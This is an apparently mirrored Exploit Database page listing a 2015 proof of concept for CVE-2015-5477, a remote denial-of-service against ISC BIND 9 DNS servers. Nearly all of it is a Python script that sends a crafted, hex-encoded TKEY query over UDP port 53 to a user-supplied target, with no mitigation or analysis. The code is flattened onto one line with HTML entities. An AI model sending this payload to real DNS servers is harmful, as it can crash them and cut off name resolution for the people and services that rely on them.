ISC BIND 9 – TKEY Remote Denial of Service (PoC)

• Exploit Database
• 117 阅读

• 作者： elceef
  日期： 2015-08-05
• 类别：

  • dos
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/37723/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28

  #!/usr/bin/env python   # Exploit Title: PoC for BIND9 TKEY DoS # Exploit Author: elceef # Software Link: https://github.com/elceef/tkeypoc/ # Version: ISC BIND 9 # Tested on: multiple # CVE : CVE-2015-5477     import socket import sys   print(&apos;CVE-2015-5477 BIND9 TKEY PoC&apos;)   if len(sys.argv) < 2: print(&apos;Usage: &apos; + sys.argv[0] + &apos; [target]&apos;) sys.exit(1)   print(&apos;Sending packet to &apos; + sys.argv[1] + &apos; ...&apos;)   payload = bytearray(&apos;4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41&apos;.replace(&apos; &apos;, &apos;&apos;).decode(&apos;hex&apos;))   sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(payload, (sys.argv[1], 53))   print(&apos;Done.&apos;)